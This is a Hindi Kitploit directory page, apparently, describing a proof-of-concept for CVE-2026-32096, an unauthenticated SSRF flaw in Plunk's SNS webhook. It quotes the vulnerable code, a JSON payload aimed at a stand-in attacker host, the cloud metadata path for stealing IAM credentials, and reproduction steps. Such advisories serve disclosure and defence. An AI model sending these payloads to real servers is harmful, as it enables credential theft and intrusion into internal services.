Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-32096 — प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट Plunk के SNS वेबहुक में SSRF भेद्यता के लिए, जो अमान्य SubscribeURL के माध्यम से बिना प्रमाणीकरण के सर्वर-साइड रिक्वेस्ट फोर्जरी प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/andrebhu/cve-2026-32096
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubandrebhu/cve-2026-32096

CVE-2026-32096

प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट Plunk के SNS वेबहुक में SSRF भेद्यता के लिए, जो अमान्य SubscribeURL के माध्यम से बिना प्रमाणीकरण के सर्वर-साइड रिक्वेस्ट फोर्जरी प्रदर्शित करता है।

रिपॉजिटरी देखें
4 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-32096

useplunk/plunk में अमान्य AWS SNS SubscriptionConfirmation के माध्यम से SSRF

सारांश

Plunk API एंडपॉइंट POST /webhooks/sns AWS SNS क्रिप्टोग्राफिक हस्ताक्षर को सत्यापित किए बिना आक्रमणकारी द्वारा आपूर्ति किए गए SubscribeURL को प्राप्त करता है। एक अनधिकृत आक्रमणकारी सर्वर को मनमाने आउटबाउंड HTTP अनुरोध (SSRF) करने के लिए मजबूर कर सकता है।

गंभीरताक्रिटिकल — CVSS 9.3 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N)
CWECWE-918: सर्वर-साइड रिक्वेस्ट फोर्जरी
प्रभावित फ़ाइलapps/api/src/controllers/Webhooks.ts
प्रमाणीकरण आवश्यककोई नहीं

कमजोर कोड

root@kitploit:~
// apps/api/src/controllers/Webhooks.ts
if (req.body.Type === 'SubscriptionConfirmation') {
  const confirmResponse = await fetch(req.body.SubscribeURL); // SSRF — कोई हस्ताक्षर सत्यापन नहीं
  if (confirmResponse.ok) {
    return res.status(200).json({ success: true, message: 'Subscription confirmed' });
  }
}

न्यूनतम पेलोड केवल दो फ़ील्ड है:

root@kitploit:~
{
  "Type": "SubscriptionConfirmation",
  "SubscribeURL": "http://attacker.example.com/callback"
}

प्रभाव

  • AWS EC2/ECS: http://169.254.169.254/latest/meta-data/iam/security-credentials/ के माध्यम से IAM क्रेडेंशियल चुराना
  • आंतरिक सेवाएँ: डेटाबेस, Redis, Kubernetes API, या अन्य गैर-इंटरनेट-एक्सपोज़्ड सेवाओं तक पहुँचना
  • पोर्ट स्कैनिंग: समय और त्रुटि-आधारित प्रतिक्रियाओं के माध्यम से आंतरिक पोर्ट की गणना करना

पुनरुत्पादन

पूर्वापेक्षाएँ

  • Docker और Docker Compose
  • Python 3

चरण

  1. Plunk परीक्षण वातावरण प्रारंभ करें:

    root@kitploit:~
    docker compose up -d
    
  2. SSRF कॉलबैक लिसनर प्रारंभ करें:

    root@kitploit:~
    python3 listener.py
    
  3. एक्सप्लॉइट चलाएँ:

    root@kitploit:~
    chmod +x exploit.sh
    ./exploit.sh
    
  4. निरीक्षण करें listener.py आउटपुट में कॉलबैक हिट, यह पुष्टि करता है कि सर्वर ने आक्रमणकारी-नियंत्रित URL प्राप्त किया।

फ़ाइलें

फ़ाइलविवरण
exploit.shएंड-टू-एंड एक्सप्लॉइट स्क्रिप्ट — कमजोर एंडपॉइंट पर नकली SNS पेलोड भेजता है
listener.pySSRF कॉलबैक लिसनर — Plunk सर्वर से आने वाले अनुरोधों को कैप्चर और लॉग करता है
docker-compose.ymlस्थानीय पुनरुत्पादन के लिए न्यूनतम Docker Compose वातावरण (Postgres, Redis, Plunk)

संदर्भ

  • AWS SNS: Amazon SNS संदेशों के हस्ताक्षर सत्यापित करना
  • OWASP SSRF रोकथाम चीट शीट
टूल डाउनलोड करें